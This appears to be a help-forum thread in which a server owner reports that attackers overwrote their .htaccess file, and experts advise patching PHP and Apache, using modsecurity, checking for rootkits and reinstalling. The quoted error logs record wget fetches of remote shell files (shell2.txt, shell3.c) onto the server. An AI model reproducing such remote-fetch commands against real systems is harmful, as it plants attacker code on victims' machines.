• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 748
  • Last Modified:

Server hacked, .htaccess file was changed

Hi experts,

I have a dedicated server with godaddy. It was attacked 3 times this morning. The .htaccess file on the server was modified and redirected to other ip: 64.28.191.117. It seems they are able to write anything to my server.
The following is the error log I got. It seems to be very helpful, but I still cannot figure out what's the hole and what I should do. Thanks a lot!

[-] prtctl: Invalid argument
[-] prtctl: Invalid argument
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]
 
    0K                                                       100%   33.38 MB/s
 
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]

Open in new window

0
z_ruixiang
Asked:
z_ruixiang
  • 7
  • 6
  • 2
1 Solution
 
Casey HermanCitrix EngineerCommented:
If this is some sort of NIX you can change your permission on the file to read only.

Casey
0
 
Jan SpringerCommented:
That doesn't help if there is an application that is vulnerable.

Are you using PHP?  What version?  What version of Apache?

Has GoDaddy been notified?
0
 
Casey HermanCitrix EngineerCommented:
That is right because you can write code to change the file modes....

Casey
0
Evaluating UTMs? Here's what you need to know!

Evaluating a UTM appliance and vendor can prove to be an overwhelming exercise.  How can you make sure that you're getting the security that your organization needs without breaking the bank? Check out our UTM Buyer's Guide for more information on what you should be looking for!

 
z_ruixiangAuthor Commented:
I have changed all the files to read only, but it didn't help.
Apache/2.0.52  running on CentOS 4.
PHP Version 4.3.9
0
 
Jan SpringerCommented:
Upgrade Apache and PHP.  Run modsecurity.  Don't walk to the task, run -- before it is too late.
0
 
z_ruixiangAuthor Commented:
Will this upgrading really help? Do I need to change my code if upgraded to PHP5?
0
 
Jan SpringerCommented:
If you are running a release of PHP or whatever that has a security vulnerability, then, YES, you need to upgrade.  If you don't want to go to PHP5, then upgrade to the latest PHP4.  And upgrade Apache while you're at it.  Install modsecurity v2.  Review your apache config file and don't load modules such as proxying, etc if you don't need or use them.
0
 
z_ruixiangAuthor Commented:
Based on the log info, can we tell whether it's because of the Apache or PHP version? I mean, I really want to know what and where the hole is, how they could write on my server.
0
 
Jan SpringerCommented:
I'd put my 2 cents on php.  Some interesting reading:

http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/

If it were my machine, I'd scratch it and start over.  But do check that a root kit hasn't been installed -> www.chkrootkit.org.  Look in /tmp for applications and/or data that do not belong.
0
 
z_ruixiangAuthor Commented:
I think you are right. I found this in error log:

--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]

And there is an unkown file in my /tmp

Is it a security vulnerability of the PHP I have? I will upgrade it.
0
 
z_ruixiangAuthor Commented:
Could you give me some instruction on how to upgrade to php5?
0
 
Jan SpringerCommented:
The problem with this is that applications could have been re-compiled by the hacker and you most likely have no idea which apps these are.

Move your webserver temporarily somewhere else and re-install is my suggestion.
0
 
z_ruixiangAuthor Commented:
I ran "yum update php", but it seems 4.3.9 is the latest version I can get.
0
 
z_ruixiangAuthor Commented:
What should I do to prevent it from being attacked if I get a new server? I'm not sure whether they still do that if I move to a totally new server.
0
 
Jan SpringerCommented:
1) install all of the latest versions of kernel and apps
2) keep a spreadsheet of current OS and application versions installed
3) subscribe to bugtraq at www.securityfocus.com
4) run modsecurity v2 with Apache 2.2.x
5) use iptables
6) periodically update and run chkrootkit -> www.chkrootkit.org
7) turn globals off in php
8) sanitize input variables to scripts and cgis
0

Featured Post

Evaluating UTMs? Here's what you need to know!

Evaluating a UTM appliance and vendor can prove to be an overwhelming exercise.  How can you make sure that you're getting the security that your organization needs without breaking the bank? Check out our UTM Buyer's Guide for more information on what you should be looking for!

  • 7
  • 6
  • 2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now